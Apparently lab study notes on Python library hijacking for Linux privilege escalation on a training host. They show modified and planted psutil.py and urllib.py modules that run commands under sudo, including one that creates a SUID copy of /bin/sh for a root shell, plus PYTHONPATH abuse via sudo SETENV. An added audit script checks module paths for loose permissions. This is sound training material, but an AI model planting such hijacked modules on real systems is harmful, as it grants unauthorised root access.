...SNIP...
def virtual_memory():
    ...SNIP...
    #### Hijacking
    import os
    os.system('id')
    global _TOTAL_PHYMEM
    ret = _psplatform.virtual_memory()
    # cached for later use in Process.memory_percent()
    _TOTAL_PHYMEM = ret.total
    return ret
...SNIP...
To be able to use this variant, two prerequisites are necessary.
The module that is imported by the script is located under one of the lower priority paths listed via the PYTHONPATH variable.
We must have write permissions to one of the paths having a higher priority on the list.
$ pip3 show psutil
...SNIP...
Location: /usr/local/lib/python3.8/dist-packages
...SNIP...
$ ls -la /usr/lib/python3.8
total 4916
drwxr-xrwx 30 root root 20480 Dec 14 16:26 .
...SNIP...
Create psutil.py in /usr/lib/python3.8
#!/usr/bin/env python3
import os

def virtual_memory():
    os.system('id')
$ sudo /usr/bin/python3 mem_status.py
uid=0(root) gid=0(root) groups=0(root)
Traceback (most recent call last):
  File "mem_status.py", line 4, in <module>
    available_memory = psutil.virtual_memory().available * 100 / psutil.virtual_memory().total
AttributeError: 'NoneType' object has no attribute 'available'
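The two prerequisites above can be checked from the defender's side before a script is allowed to run under sudo. The following audit is an added example, not code from the original notes: it resolves where a module is loaded from and reports the module file plus every directory searched up to that point that is group/world-writable or owned by an untrusted account. The function names, the `trusted_uids` parameter and the temporary layout built in `demo()` are assumptions for illustration, and only plain `.py` modules and regular packages are covered.

```python
import os
import stat
import sys
import tempfile

def locate(name, dirs):
    """Return (index, file) for the first directory in `dirs` that provides `name`."""
    for i, base in enumerate(dirs):
        for cand in (os.path.join(base, name, "__init__.py"),
                     os.path.join(base, name + ".py")):
            if os.path.isfile(cand):
                return i, cand
    return None, None

def untrusted_write(path, trusted_uids):
    """True if group/other may write to `path` or its owner is not trusted."""
    try:
        st = os.stat(path)
    except OSError:
        return False  # entry does not exist, nothing to check
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)) or st.st_uid not in trusted_uids

def audit_import(name, search_path, trusted_uids=(0,)):
    """Return the module's origin and every path where it could be replaced or shadowed."""
    dirs = [os.path.abspath(e) for e in search_path]  # '' resolves to the cwd
    idx, origin = locate(name, dirs)
    if origin is None:
        return {"origin": None, "findings": []}
    # The module file, each directory searched up to the hit, and a package directory.
    targets = [origin] + list(dict.fromkeys(dirs[:idx + 1] + [os.path.dirname(origin)]))
    return {"origin": origin,
            "findings": [t for t in targets if untrusted_write(t, trusted_uids)]}

def demo():
    """Constructed layout: loosely permissioned early directory, module in a later one."""
    root = tempfile.mkdtemp()
    early, late = os.path.join(root, "early"), os.path.join(root, "late")
    for d, mode in ((early, 0o757), (late, 0o755)):  # 0o757 = drwxr-xrwx as on the page
        os.mkdir(d)
        os.chmod(d, mode)
    mod = os.path.join(late, "psutil.py")
    with open(mod, "w") as fh:
        fh.write("def virtual_memory():\n    return None\n")
    os.chmod(mod, 0o644)
    return early, mod, audit_import("psutil", [early, late], (0, os.getuid()))

if __name__ == "__main__":
    for name in sys.argv[1:]:
        print(name, audit_import(name, sys.path))
```

Run it with the same interpreter and environment the reviewed script uses, passing the module names that script imports, because `sys.path` differs between interpreters and users. An empty `findings` list means none of the checked paths has the loose permissions both prerequisites depend on.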
Python first checks for modules in the current working directory before looking in the other paths. If the vulnerable script is in /home, create the new file there.
user@NIX02:~$ pwd
/home/user
user@NIX02:~$ ls
apache_restart.py
user@NIX02:~$ cat urllib.py
import os
os.system("cp /bin/sh /tmp/sh;chmod u+s /tmp/sh")
$ ls /tmp
sh
user@NIX02:/tmp$ ./sh -p
# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)
# ls /root
PYTHONPATH Environment Variable
$ sudo -l
Matching Defaults entries for htb-student on ACADEMY-LPENIX:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User htb-student may run the following commands on ACADEMY-LPENIX:
    (ALL : ALL) SETENV: NOPASSWD: /usr/bin/python3
Moved the previous Python script psutil.py from the /usr/lib/python3.8 directory to /tmp.